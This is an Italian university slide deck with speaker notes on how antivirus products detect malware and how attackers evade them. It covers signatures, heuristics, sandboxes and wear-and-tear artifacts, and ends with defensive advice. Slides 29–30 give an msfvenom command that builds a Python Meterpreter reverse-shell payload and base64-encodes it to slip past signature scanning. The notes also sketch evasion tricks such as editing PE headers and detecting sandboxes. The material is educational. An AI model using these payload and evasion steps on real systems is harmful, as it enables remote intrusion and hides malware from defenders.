Antivirus & Antivirus Evasion
•Als PPTX, PDF herunterladen•
0 gefällt mir•158 views
Un virus, in informatica, è un software, appartenente alla categoria dei malware ,che una volta eseguito, si integra in qualche codice eseguibile (incluso il sistema operativo) del sistema informatico vittima, in modo tale da diffondersi su altro codice eseguibile quando viene eseguito il codice che lo ospita, senza che l'utente ne sia a conoscenza. L’antivirus è un programma che protegge pc, smartphone e tablet da software potenzialmente dannosi, come i virus, i malware, i cryptolocker e i worm. LINGUA: ITALIANO
Empfohlen
Empfohlen
Weitere ähnliche Inhalte
Ähnlich wie Antivirus & Antivirus Evasion
Ähnlich wie Antivirus & Antivirus Evasion (20)
Mehr von Francesco Garofalo
Antivirus & Antivirus Evasion
- 1. Antivirus Evasion (Techinche di analisi e di elusione degli Antivirus) FRANCESCO GAROFALO PROFESSORE: ALFREDO DE SANTIS CORSO: SICUREZZA DEI DATI
- 2. Index: • Introduzione agli antivirus • Cosa sono i virus? • Statistiche Malware • Cosa sono e come funzionano gli Antivirus? • Antivirus Evasion • Tecniche di elusione degli Antivirus • Elusione Analisi Statica Antivirus • Caso Pratico Evasion con MSFVenom e Py2Exe • Sandbox Evasion • Wear andTear Artifacts • Conclusioni
- 3. Index: • Introduzione agli antivirus • Cosa sono i virus? • Statistiche Malware • Cosa sono e come funzionano gli Antivirus? • Antivirus Evasion • Tecniche di elusione degli Antivirus • Elusione Analisi Statica Antivirus • Caso Pratico Evasion con MSFVenom e Py2Exe • Sandbox Evasion • Wear andTear Artifacts • Conclusioni
- 4. Cos’è un Virus? Un virus, in informatica, è un software, appartenente alla categoria dei malware ,che una volta eseguito, si integra in qualche codice eseguibile (incluso il sistema operativo) del sistema informatico vittima, in modo tale da diffondersi su altro codice eseguibile quando viene eseguito il codice che lo ospita, senza che l'utente ne sia a conoscenza.
- 7. Index: • Introduzione agli antivirus • Cosa sono i virus? • Statistiche Malware • Cosa sono e come funzionano gli Antivirus? • Antivirus Evasion • Tecniche di elusione degli Antivirus • Elusione Analisi Statica Antivirus • Caso Pratico Evasion con MSFVenom e Py2Exe • Sandbox Evasion • Wear andTear Artifacts • Conclusioni
- 8. Rapporto Clusit 2019 Secondo il rapporto Clusit del 2019, il 2018 è stato l’anno peggiore di sempre in termini di minacce “cyber”, sia dal punto di vista quantitativo che dal punto di vista qualitativo. [1]
- 9. Rapporto Clusit 2014-2019 1600 1500 1400 1300 1200 1100 1000 900 800 2014 2015 2016 2017 2018 © Clusit - Rapporto 2019 sulla Sicurezza ICT in Italia
- 10. © Clusit - Rapporto 2019 sulla Sicurezza ICT in Italia TECNICHE DIATTACCO PER TIPOLOGIA 2014 2015 2016 2017 2018 2018 su2017 Malware 127 106 229 446 585 31,2% Unknown 199 232 338 277 408 47,3% Known Vulnerabilities / Misconfig. 195 184 136 127 177 39,4% Phishing/Social Engineering 4 6 76 102 160 56,9% Multiple Techniques /APT 60 104 59 63 98 55,6% Account Cracking 86 91 46 52 56 7,7% DDoS 81 101 115 38 38 0,0% 0-day 8 3 13 12 20 66,7% Phone Hacking 3 1 3 3 9 200,0% SQL Injection 110 184 35 7 1 -85,7%
- 11. © Clusit - Rapporto 2019 sulla Sicurezza ICT in Italia TECNICHE DIATTACCO PER TIPOLOGIA 2014 2015 2016 2017 2018 2018 su2017 Malware 127 106 229 446 31,2% Unknown 199 232 338 277 408 47,3% Known Vulnerabilities / Misconfig. 195 184 136 127 177 39,4% Phishing/Social Engineering 4 6 76 102 56,9% Multiple Techniques /APT 60 104 59 63 98 55,6% Account Cracking 86 91 46 52 56 7,7% DDoS 81 101 115 38 38 0,0% 0-day 8 3 13 12 20 66,7% Phone Hacking 3 1 3 3 9 200,0% SQL Injection 110 184 35 7 1 -85,7% 585 160
- 12. Index: • Introduzione agli antivirus • Cosa sono i virus? • Statistiche Malware • Cosa sono e come funzionano gli Antivirus? • Antivirus Evasion • Tecniche di elusione degli Antivirus • Elusione Analisi Statica Antivirus • Caso Pratico Evasion con MSFVenom e Py2Exe • Sandbox Evasion • Wear andTear Artifacts • Conclusioni
- 13. Cos’è un Antivirus? L’antivirus è un programma che protegge pc, smartphone e tablet da software potenzialmente dannosi, come i virus, i malware, i cryptolocker e i worm.
- 14. Metodi di Analisi 1. Metodo delle Firme (signatures) 2. Euristiche 3. Analisi Comportamentale 4. Data Mining 5. Sandbox
- 15. Metodi di Analisi – Metodo delle Firme 1. Metodo delle Firme (signatures) 2. Euristiche 3. Analisi Comportamentale 4. Data Mining 5. Sandbox
- 16. Metodi di Analisi - Euristiche 1. Metodo delle Firme (signatures) 2. Euristiche 3. Analisi Comportamentale 4. Data Mining 5. Sandbox
- 17. Metodi di Analisi – Analisi Comportamentale 1. Metodo delle Firme (signatures) 2. Euristiche 3. Analisi Comportamentale 4. Data Mining 5. Sandbox
- 18. Metodi di Analisi – Data Mining 1. Metodo delle Firme (signatures) 2. Euristiche 3. Analisi Comportamentale 4. Data Mining 5. Sandbox
- 19. Metodi di Analisi - Sandbox 1. Metodo delle Firme (signatures) 2. Euristiche 3. Analisi Comportamentale 4. Data Mining 5. Sandbox
- 20. Tipologia di Analisi – Analisi Statica 1. Analisi Statica 2. Analisi Dinamica
- 21. Tipologia di Analisi – Analisi Dinamica 1. Analisi Statica 2. Analisi Dinamica
- 22. Index: • Introduzione agli antivirus • Cosa sono i virus? • Statistiche Malware • Cosa sono e come funzionano gli Antivirus? • Antivirus Evasion • Tecniche di elusione degli Antivirus • Elusione Analisi Statica Antivirus • Caso Pratico Evasion con MSFVenom e Py2Exe • Sandbox Evasion • Wear andTear Artifacts • Conclusioni
- 23. Antivirus Evasion Le tecniche di antivirus evasion sono utilizzate dai creatori di malware per creare payload al fine di bypassare una o più applicazioni software antivirus. Esistono diversi tool per l’antivirus evasion.
- 24. Tecniche di elusione degli Antivirus •Evading signature •Evading scanner •Evading Heuristics •File splitting • Disabling antivirus •Adding antivirus exception •Fake signature
- 25. Evading signature •Calcolo dell’Hash •Evadere la firma specifica
- 26. Evading Scanner •File di grandi dimensioni •Confusione del formato del file
- 27. Evading Heuristics •Bypassing euristico statico •Bypassing euristico dinamico
- 28. File Splitting
- 29. msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.13 LPORT=443 -f raw -o mrtp.py Evading Signature: caso pratico
- 30. msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.13 LPORT=443 -f raw -o mrtp.py cat mrtp.py | base64 Evading Signature: caso pratico
- 31. Evading Signature: caso pratico
- 32. Index: • Introduzione agli antivirus • Cosa sono i virus? • Statistiche Malware • Cosa sono e come funzionano gli Antivirus? • Antivirus Evasion • Tecniche di elusione degli Antivirus • Elusione Analisi Statica Antivirus • Caso Pratico Evasion con MSFVenom e Py2Exe • Sandbox Evasion • Wear andTear Artifacts • Conclusioni
- 33. Sandbox – Analisi Dinamica Automatica Esistono diversi tool per l’analisi dinamica automatica di Malware all’interno di una sandbox.
- 34. Sandbox – Fingerprinting Meccanismi Run-time di API – hooks Caratteristiche di emulazione: VMware, QEMU, BOCHS, Android Emulator, etc. Euristiche Statiche: Versione del Bios, configurazione hardware delleVM . CPU emulate Numero ridotto di processi
- 35. Sandbox Evasion Attraverso Sandbox Evasion, il Malware cambia il suo comportamento e non viene rilevato durante l'analisi della Sandbox.
- 36. Difese contro Sandbox Evasion 1. Simulare un ambiente reale in un ambiente virutale: Transparent Sandboxes 2. Eseguire il Malware in un ambiente reale; 3. Eseguire il Malware in più ambienti ed esaminare le differenze nei comportamenti.
- 37. Sandbox celata
- 38. Come può un attaccante eludere l’analisi dinamica della sandbox?
- 39. Wear and Tear
- 40. Wear and Tear Artifacts - Rete 1. Rete •DNS Cache •ARP Cache •CachedWireless SSIDs •DownloadedCertificate Revocation List
- 41. Wear and Tear Artifacts - Browser 1.Rete 2.Browser •Cache •Cookie •Preferiti •File Scaricati •Cronologia
- 42. Wear and Tear Artifacts - Registro 1.Rete 2.Browser 3.Registro •Le applicazioni installate e disinstallate •Shared DLL •Sistemi di Caching •Regole del Firewall •Applicazioni nello StartUp
- 43. Wear and Tear Artifacts - Sistema 1.Rete 2.Browser 3.Registro 4.Sistema •Log degli eventi •Numero di processi •Caratteristiche del sistema
- 44. Wear and Tear Artifacts - Disco 1.Rete 2.Browser 3.Registro 4.Sistema 5.Disco •FileTemporanei •File Dump •File eliminati •File nel cestino
- 45. Wear and Tear - Raccolta dei dati
- 46. W&T Sistema: Analisi dei dati
- 47. W&T Registro: Analisi dei dati
- 48. Wear and Tear - Classificatore
- 49. Wear and Tear - Correlazione tra Età e Artefatti
- 50. Wear and Tear - Le Sandbox mentono!
- 51. Wear and Tear : Anti-Evasion •Detect Probing Activities •Servirsi di Sandbox vecchie ed usate
- 52. Conclusioni In conclusione molti Antivirus possono essere elusi da “nuovi”Virus
- 53. Conclusioni – Raccomandazioni 1. Non esegure applicazioni come Amministratore/Root
- 54. Conclusioni – Raccomandazioni 2. Invesire in sistemi di rilevamento più aggiornati
- 55. Conclusioni – Raccomandazioni 3. Utilizzare diversi prodotti per la sicurezza del pc
- 56. Conclusioni – Raccomandazioni 4. Formazione personale
- 58. Riferimenti • Spotless Sandboxes: Evading Malware Analysis System using Wear-and-Tear Artifacts, 2017 IEEE Symposium on Security and Privacy • Sandbox Evasion: http://unprotect.tdgt.org/index.php/Sandbox_Evasion • Antivirus Evasion: http://unprotect.tdgt.org/index.php/Antivirus_Evasion • Dynamic Malware Analysis of Phishing Emails 2018 9° International Conference on Infomation and Communication System (ICICS) • https://www.kaspersky.it/resource-center/threats/computer-viruses-and- malware-facts-and-faqs • https://www.kaspersky.it/blog/signature-virus-disinfection/9151/ • IE11 –Win81 PenetrationTestTool
Hinweis der Redaktion
- Trojan: nasconde il suo funzionamento all'interno di un altro programma apparentemente utile e innocuo. L'utente, eseguendo o installando quest'ultimo programma, in effetti attiva anche il codice del trojan nascosto. L’etimologia deriva dalla guerra tra achei e troiani del 12’ secolo a.c, il cavallo fu usato da ulisse per porre fine al conflitto. RAT: RMS Rat è un virus ad alto rischio che si insinua furtivamente nel sistema e garantisce ai cyber criminali l'accesso remoto ai computer delle vittime. Sono dei Trojan ad accesso remoto (detti anche RAT dall'inglese Remote Administration Tool), composti generalmente da 2 file: il file server, che viene installato nella macchina vittima, ed un file client, usato dall'attaccante per inviare istruzioni che il server esegue Backdoor: Sono dei software per aggirare le difese, firewall e/o antivirus, della macchina target, al fine di ottenere il controllo parziale o completo di questa. Molto spesso sono utilizzate per effettuare exploit. Bot: i bot dannosi sono definiti malware auto-propaganti che infetta la macchina attaccata e si ricollega a uno o più server centrali. Il server funziona come un "centro di comando e controllo" per una botnet o una rete di computer compromessi e dispositivi simili. I bot dannosi hanno la "capacità di auto-propagarsi come un worm" e possono anche Ransomeware: Con il termine Ransomware definiamo tutti quei programmi che bloccano l’accesso ai file di documenti o allo stesso computer, chiedendo un riscatto in denaro.
- CLUSIT – Associazione Italiana per la Sicurezza Informatica Promuovere e diffondere nel nostro paese la cultura e la consapevolezza della sicurezza informatica in tutti i suoi aspetti, in collaborazione alle consociate associazioni europee. Promuovere iniziative per la formazione e la sensibilizzazione, in particolare tramite l’organizzazione di seminari e la pubblicazione di documenti, relativi alla sicurezza informatica; Fornire supporto alle imprese in materia di sicurezza informatica; Proporre raccomandazioni in materia di sicurezza informatica; Intraprendere iniziative nei confronti di aziende ed autorità competenti, con lo scopo di coordinare, sia sul piano nazionale che internazionale, l’evoluzione delle tecniche e delle norme di sicurezza.
- Lo studio si basa su un campione che al 31 dicembre 2018 è costituito da 8.417 attacchi noti di particolare gravità, ovvero che hanno avuto un impatto significativo per le vittime in termini di perdite economiche, di danni alla reputazione, di diffusione di dati sensibili (per- sonali e non), o che comunque prefigurano scenari particolarmente preoccupanti, avvenuti nel mondo (inclusa quindi l’Italia) dal primo gennaio 2011, di cui 1.552 nel 2018 (+77,8% rispetto al 2014, + 37,7% rispetto al 2017) e 5.614 registrati tra il 2014 e il 2018 .
- Le SQL injection finalmente crollano all’ultimo posto facendo segnare un -85,7% rispetto al 2017 . Lo sfruttamento di vulnerabi- lità note invece è ancora in crescita (+39,4%), così come l’utilizzo di vulnerabilità “0-day”, (+66,7%), per quanto In sostanza gli attaccanti possono fare affidamento sull’efficacia del malware “semplice”, prodotto industrialmente a costi decrescenti, e sulle tecniche di Phishing / Social Engineering (+56,9%), per conseguire la gran maggioranza dei loro obiettivi .
- Le SQL injection finalmente crollano all’ultimo posto facendo segnare un -85,7% rispetto al 2017 . Lo sfruttamento di vulnerabilità note invece è ancora in crescita (+39,4%), così come l’utilizzo di vulnerabilità “0-day”, (+66,7%), per quanto In sostanza gli attaccanti possono fare affidamento sull’efficacia del malware “semplice”, prodotto industrialmente a costi decrescenti, e sulle tecniche di Phishing / Social Engineering (+56,9%), per conseguire la gran maggioranza dei loro obiettivi .
- Metodo delle Firme (signatures): Confronto del file da analizzare con un archivio in cui sono schedati tutti i malware conosciuti, o meglio le loro firme(una firma è una sequenza continua di byte che è comune per alcuni malware).
- Metodo delle Firme (signatures): Confronto del file da analizzare con un archivio in cui sono schedati tutti i malware conosciuti, o meglio le loro firme(una firma è una sequenza continua di byte che è comune per alcuni malware). Euristiche: Tecnologie complementare alla signature, scansione della memoria o del codice sorgente alla ricerca di pattern noti come maligni. Un antivirus con delle euristiche troppo rigide può portare a falsi positivi. Analisi Comportamentale:
- Metodo delle Firme (signatures): Confronto del file da analizzare con un archivio in cui sono schedati tutti i malware conosciuti, o meglio le loro firme(una firma è una sequenza continua di byte che è comune per alcuni malware). Euristiche: Tecnologie complementare alla signature, scansione della memoria o del codice sorgente alla ricerca di pattern noti come maligni. Un antivirus con delle euristiche troppo rigide può portare a falsi positivi. Analisi Comportamentale:
- Metodo delle Firme (signatures): Confronto del file da analizzare con un archivio in cui sono schedati tutti i malware conosciuti, o meglio le loro firme(una firma è una sequenza continua di byte che è comune per alcuni malware). Euristiche: Tecnologie complementare alla signature, scansione della memoria o del codice sorgente alla ricerca di pattern noti come maligni. Un antivirus con delle euristiche troppo rigide può portare a falsi positivi. Analisi Comportamentale:
- Metodo delle Firme (signatures): Confronto del file da analizzare con un archivio in cui sono schedati tutti i malware conosciuti, o meglio le loro firme(una firma è una sequenza continua di byte che è comune per alcuni malware). Euristiche: Tecnologie complementare alla signature, scansione della memoria o del codice sorgente alla ricerca di pattern noti come maligni. Un antivirus con delle euristiche troppo rigide può portare a falsi positivi. Analisi Comportamentale:
- Metodo delle Firme (signatures): Confronto del file da analizzare con un archivio in cui sono schedati tutti i malware conosciuti, o meglio le loro firme(una firma è una sequenza continua di byte che è comune per alcuni malware). Euristiche: Tecnologie complementare alla signature, scansione della memoria o del codice sorgente alla ricerca di pattern noti come maligni. Un antivirus con delle euristiche troppo rigide può portare a falsi positivi. Analisi Comportamentale:
- Analsi Statica: Analizza il codice del malware usando alcune tecniche di reverse engineering. Questa tecnica può essere fallace nel caso in cui il malware riceva istruzioni da internet oppure quando il codice malevole è offuscato o criptato. Il metodo delle fil
- Analisi Dinamica: L’analisi dinamica sconfigge l’offuscamento del codice attraverso l’esecuzione e l’analisi del comportamento di questo. L’obiettivo è capire lo scopo de malware quando si avvia, cosa scarica da internet e cosa esegue, cosa trasmette.
- Le tecniche di antivirus evasion sono utilizzate dai creatori di malware per creare payload al fine di bypassare una o più applicazioni software antivirus. Ciò garantisce che il payload che l'utente malintenzionato desidera eseguire sul computer di destinazione o sui computer non sia bloccato dal software antivirus e possa eseguire le azioni richieste.
- Calcolo dell'hash: Gli AV sono in grado di rilevare se si tratta di un Malware noto calcolando l'hash del file, modificando un semplice bit in binario consentono al campione di eludere il rilevamento dell'hash. Evadere la firma specifica:Alcune firme sono specificamente progettate per catturare un exploit o un comportamento specifico. Invertendo la firma, è possibile modificare il malware per eludere la firma. Ad esempio, modificando la dimensione della corrispondenza del payload o modificando l'intestazione del file. Trucchi in formato PE:La firma di elusione può essere eseguita anche modificando la struttura PE (cambiando i nomi delle sezioni, TimeDateStamp, MajorLinkerVersion / MinorLinkerVersion, Major / Minor OperatingSystemVersion e ImageVersion / MinorImageVersion, AddressOfEntryPoint, Numero massimo di sezioni, Lunghezza del file.
- Big File: A causa del limite di dimensioni del file imposto, è possibile indurre lo scanner a saltare un file modificando le dimensioni del file per renderlo maggiore del limite di dimensioni codificato. Questo limite di dimensione del file si applica in particolare ai motori euristici basati su dati statici. Il formato di file confuso è un altro trucco che può essere utilizzato per bypassare un rilevamento AV specifico per un formato di file.
- Bypassing euristico statico: Osservando la struttura di PE e il contenuto del file, il motore è in grado di rilevare se il file è dannoso o meno. Alcuni AV possono essere facilmente imbrogliati analizzandoli. Ad esempio, un motore euristico può provare a capire se un file utilizza una doppia estensione (ad esempio: invoice.doc.exe) e determinare il file come dannoso. Bypassing euristico dinamico: I motori euristici dinamici sono implementati sotto forma di hook (in user-land o kernel-land) o basati sull'emulazione. Gli hook di land-user (HIPS) possono essere facilmente ignorati dal malware rattoppando il punto di ingresso della funzione hook. Per l'hook kernel-land, il malware deve essere eseguito nello spazio del kernel installando un driver o abusando di una vulnerabilità a livello di kernel.
- Gli Splitters sono programmi che permettono di dividere in più parti un file malevolo rendendo di fatto più complessa la rilevazione da parte dell’Antivirus. La controindicazione è che occorre lo stesso programmino che ha diviso il file per riaccorparlo sulla macchina dove il malware deve attivarsi. Questo rende poco popolari gli Splitters tra i software di evasione.
- Api-hooks : Tecniche che alterano il normale comportamento di un S.O. al fine di intercettare messaggi tra le componenti SW e le componenti del S.O. al fine di creare una tabella dei movimenti Timing attacks: È un attacco in cui l’attaccante tenta di compromettere un sistema crittografico analizzando il tempo impiegato per eseguire attacci crittografici-.
- Il sandboxing è una delle soluzioni di sicurezza più utili, tuttavia le best practice non vengono sempre seguite e il malware è in grado di rilevare facilmente l'ambiente sandbox. I sandbox sono spesso configurati in modo errato. Con semplici trucchi come il rilevamento del nome host, l'indirizzo mac o il rilevamento di processi, il malware può rilevare l'ambiente. Le funzionalità di evasione del sandbox consentono al malware di non essere rilevato durante l'analisi del sandbox.
- Ogni volta che un utente si collega ad una rete wireless oppure prova a risolvere un nome di dominio, ottenere il MAC address di un gateway i dati vengono memorizzati nella cache DNS. Oppure quando un utente invia un pacchetto ad una destinazione remota, consulta la ARP cache per trovare l’indirizzo MAC del gateway. Oppure i certificati che sono stati scaricati. La rete è un forte indicatore dell’uso del pc.
- Ogni volta che un utente si collega ad una rete wireless oppure prova a risolvere un nome di dominio, ottenere il MAC address di un gateway i dati vengono memorizzati nella cache DNS. Oppure quando un utente invia un pacchetto ad una destinazione remota, consulta la ARP cache per trovare l’indirizzo MAC del gateway. Oppure i certificati che sono stati scaricati. La rete è un forte indicatore dell’uso del pc.
- È stata effettuata un’indagine sonda per verificare se realemente esiste una correlazione tra le cinque categorie dell’artefatto quando sono macchine reali vs sandbox malware. 270 Utenti vs 98 Sandbox vs 22 BaseLine (Utilizzate diverse versioni di Windows) The majority of these observations (89.4%) originate from Amazon Mechanical Turk workers, who downloaded and executed our artifact-probing tool, and the remaining from systems operated by friends and colleagues. The users who participated in this study come from 35 different countries, with the top countries being: US (44%), India (18%), GB (10%), CA (8%), NL (1%), PK (1%), RU (1%) and 28 other countries with lower than 1% frequency. Therefore, we argue that our dataset is representative of users from both developed and developing countries, whose machines may have different wear-and-tear characteristics. The BIOS vendor distribution of the user systems is shown in Table II. As the table shows, the users’ personal systems include different brands, such as Dell, HP, Lenovo, Toshiba, and Acer, as well as game series systems such as Alienware.
- Shim Cache Entries:
- Non eseguire mai come amministratore se non è necessario. Questa è una regola d'oro, può evitare il 99% di malware senza avere un AV. Questo è stato il modo normale di fare cose per gli utenti Linux per anni. Secondo me è la misura di sicurezza più importante.